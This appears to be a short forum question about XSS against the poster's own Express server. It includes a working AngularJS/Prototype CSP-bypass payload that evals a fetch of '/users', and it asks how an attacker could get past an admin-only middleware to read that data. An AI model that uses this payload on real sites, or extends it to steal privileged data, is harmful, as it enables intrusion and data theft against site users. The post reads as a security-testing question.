26Nis
Overcoming Middleware: Exploiting XSS to Retrieve Data
I am attempting to perform an XSS attack on my server and have successfully bypassed the CSP. In my server code, I store all users in the following manner:
.get("/users", adminReq, (req, res) => {
...
})
Due to the adminReq middleware, which is simply a check to verify if the requester is an admin, I am unable to retrieve the data within /users.
When an attacker executes an XSS attack within a text input, the following code effectively works only when adminReq is removed:
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></SCRIPT>
<SCRIPT src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js"></SCRIPT>
<div ng-app ng-csp>
{{$on.curry.call().eval("fetch('/users').then(response =>
response.json()).then(data => alert(JSON.stringify(data)))")}}
</div>
How can an attacker retrieve the data through XSS despite the presence of the middleware?
